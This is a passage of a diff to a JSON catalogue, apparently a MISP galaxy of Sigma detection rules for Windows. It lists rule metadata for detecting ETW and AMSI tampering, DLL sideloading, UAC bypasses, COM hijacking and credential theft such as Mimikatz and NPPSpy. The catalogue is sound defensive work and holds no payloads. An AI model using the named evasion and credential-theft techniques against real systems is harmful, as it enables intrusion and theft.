"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "value": "AutoLogger Sessions Tamper" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dot_net_etw_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "value": "ETW Logging Disabled In .NET Processes - Sysmon Registry" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_shim_databases_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ] + }, + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Registry Key Creation or Modification for Shim DataBase" + }, + { + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Probable legitimate applications. If you find these please add them to an exclusion list" + ], + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "value": "COM Hijacking For Persistence With Suspicious Locations" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "value": "Internet Explorer Autorun Keys Modification" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "registry_set_new_network_provider.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "value": "New Network Provider - Registry" + }, + { + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", + "value": "Disable Internal Tools or Feature in Registry" + }, + { + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_amsi_com_hijack.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "160d2780-31f7-4922-8b3a-efce30e63e96", + "value": "Potential AMSI COM Server Hijacking" + }, + { + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate registration of IFilters by the OS or software" + ], + "filename": "registry_set_ifilter_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1468548924600459267", + "https://persistence-info.github.io/Data/ifilters.html", + "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", + "value": "Register New IFiltre For Persistence" + }, + { + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_vbs_payload_stored.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", + "value": "VBScript Payload Stored in Registry" + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_typed_paths.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://forensafe.com/blogs/typedpaths.html", + "https://twitter.com/dez_/status/1560101453150257154", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", + "value": "Persistence Via TypedPaths" + }, + { + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Administrative scripts", + "Installation of a service" + ], + "filename": "registry_set_servicedll_hijack.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "value": "ServiceDll Hijack" + }, + { + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "meta": { + "author": "Den Iuzvyk", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_abusing_azure_browser_sso.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" + ] + }, + "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "value": "Abusing Azure Browser SSO" + }, + { + "description": "Detects any assembly DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "value": "dotNET DLL Loaded Via Office Applications" + }, + { + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/17", + "falsepositive": [ + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + ], + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ] + }, + "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "value": "WMIC Loading Scripting Libraries" + }, + { + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "meta": { + "author": "frack113", + "creation_date": "2022/12/31", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_lolbin_coregen.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_lolbin_coregen.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1055" + ] + }, + "uuid": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "value": "Potential DLL Sideloading Using Coregen.exe" + }, + { + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Other DLLs with that import hash" + ], + "filename": "image_load_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "49329257-089d-46e6-af37-4afce4290685", + "value": "SharpEvtMute Imphash EvtMuteHook Load" + }, + { + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "meta": { + "author": "Nasreddine Bencherchali, Subhash Popuri (@pbssubhash)", + "creation_date": "2022/12/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_side_load_comctl32.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6360757a-d460-456c-8b13-74cf0e60cceb", + "value": "Potential DLL Sideloading Via comctl32.dll" + }, + { + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wsman_provider_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/bohops/WSMan-WinRM", + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "value": "Suspicious WSMAN Provider Image Loads" + }, + { + "description": "Detects DSParse DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dsparse_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "value": "Active Directory Parsing DLL Loaded Via Office Applications" + }, + { + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "meta": { + "author": "Markus Neis, @markus_neis", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_ps_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "value": "Image Load of VSS_PS.dll by Uncommon Executable" + }, + { + "description": "Attempts to load dismcore.dll after dropping it", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/06", + "falsepositive": [ + "Actions of a legitimate telnet client" + ], + "filename": "image_load_uac_bypass_via_dism.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" + ] + }, + "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", + "value": "UAC Bypass With Fake DLL" + }, + { + "description": "Detects processes loading modules related to PCRE.NET package", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_pcre_net_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, - "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "value": "Windows Defender Threat Detected" + "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "value": "PCRE.NET Package Image Load" }, { - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "description": "Detects any GAC DLL being loaded by an Office Product", "meta": { - "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", - "creation_date": "2017/08/22", + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "value": "GAC DLL Loaded Via Office Applications" + }, + { + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_uac_bypass_iscsicpl.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1547583317410607110", + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", + "value": "UAC Bypass Using Iscsicpl - ImageLoad" + }, + { + "description": "Detects CLR DLL being loaded by an Office Product", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "value": "CLR DLL Loaded Via Office Applications" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_pingback_backdoor.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "value": "Pingback Backdoor - Image" + }, + { + "description": "Detects certain DLL loads when Mimikatz gets executed", + "meta": { + "author": "sigma", + "creation_date": "2017/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_mimikatz_inmemory_detection.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ] + }, + "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "value": "Mimikatz In-Memory" + }, + { + "description": "Detects WMI command line event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], - "filename": "win_wmi_persistence.yml", + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "value": "WMI Persistence - Command Line Event Consumer" + }, + { + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "FP could occure if the legitimate version of vmGuestLib already exists on the system" + ], + "filename": "image_load_side_load_vmguestlib.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "value": "VMGuestLib DLL Sideload" + }, + { + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usualy to achieve techniques such as UAC bypass and privilege escalation", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_non_existent_dlls.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "value": "Sideloading Of Non-Existent DLLs From System Folders" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_side_load_web_browsers.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "value": "Web Browsers DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "filename": "image_load_side_load_dbgcore_dll.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "value": "DLL Sideloading Of DBGCORE.DLL" + }, + { + "description": "Detects the image load of VSS DLL by uncommon executables", + "meta": { + "author": "frack113", + "creation_date": "2022/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_susp_vss_dll_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/ORCx41/DeleteShadowCopies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": 